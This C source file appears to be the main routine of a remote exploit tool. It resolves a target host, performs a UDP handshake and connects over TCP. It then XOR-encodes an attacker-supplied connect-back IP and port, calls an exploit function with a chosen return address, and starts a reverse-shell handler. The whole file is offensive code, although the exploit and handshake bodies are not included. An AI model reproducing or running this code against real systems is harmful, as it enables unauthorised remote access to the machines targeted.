
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct in_addr {int dummy; } ;
struct sockaddr_in {unsigned short sin_port; struct in_addr sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
struct TYPE_2__ {int num; int ret; char* name; } ;


 int AF_INET ;
 int IPPROTO_UDP ;
 unsigned short PORT_UDP ;
 int SOCK_DGRAM ;
 int SOCK_STREAM ;
 unsigned short atoi (char*) ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int exploit (int,unsigned long,unsigned short,int) ;
 int fprintf (int ,char*,char*) ;
 struct hostent* gethostbyname (char*) ;
 int header () ;
 unsigned short htons (unsigned short) ;
 unsigned long inet_addr (char*) ;
 int isip (char*) ;
 int printf (char*,...) ;
 int scanf (char*,int*) ;
 unsigned short send_handshake (int,struct sockaddr_in) ;
 int socket (int ,int ,int ) ;
 int start_reverse_handler (char*) ;
 int stderr ;
 int system (char*) ;
 TYPE_1__* target ;

int
main ( int argc, char* argv[] )
{
 int s1, s2, targ, i;
 unsigned long xoredcbip;
 unsigned short cbport, xoredcbport, port;
 struct sockaddr_in remote_addr;
 struct hostent* host_addr;

 if ( argc != 4 )
 {
  printf ( "Usage: %s <ip> <cbip> <cbport>\n", argv[0] );
  exit ( 1 );
 }
 system ( "clear" );
 header ();
 if ( !isip ( argv[1] ) )
 {
  printf ( "Invalid Target IP!\n" );
  exit ( 1 );
 }
 if ( !isip ( argv[2] ) )
 {
  printf ( "Invalid connect back IP!\n" );
  exit ( 1 );
 }
 printf("--[ select target\n");
 for ( i = 0; i < 2; i++ )
  printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
 printf ( " >> " );
 scanf ( "%d", &targ );
 if ( targ != 0 )
  if ( targ != 1 )
  {
   printf ( "--[ invalid target!\n" );
   exit ( 1 );
  }
 if ( ( host_addr = gethostbyname ( argv[1] ) ) == ((void*)0) )
 {
  fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
  exit ( 1 );
 }
 remote_addr.sin_family = AF_INET;
 remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
 remote_addr.sin_port = htons ( PORT_UDP );
 if ( ( s1 = socket ( AF_INET, SOCK_DGRAM, IPPROTO_UDP ) ) < 0 )
    {
  printf ( "socket failed!\n" );
  exit ( 1 );
 }
 if ( ( port = send_handshake ( s1, remote_addr ) ) == 1 )
 {
  printf ( "handshake FAILED!\n" );
  exit ( 1 );
 }
 close ( s1 );
 if ( ( s2 = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
  printf ( "socket failed!\n" );
  exit ( 1 );
 }
 printf ( "--[ connecting to %s:%u [TCP]...", argv[1], port );
 remote_addr.sin_port = htons ( port );
 if ( connect ( s2, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
 {
  printf ( "failed!\n" );
  exit ( 1 );
 }
 printf ( "done!\n" );

 xoredcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
 xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;

 if ( exploit ( s2, xoredcbip, xoredcbport, target[targ].ret ) == 1 )
 {
  printf ( "exploitation FAILED!\n" );
  exit ( 1 );
 }
 close ( s2 );
 start_reverse_handler ( argv[3] );
}
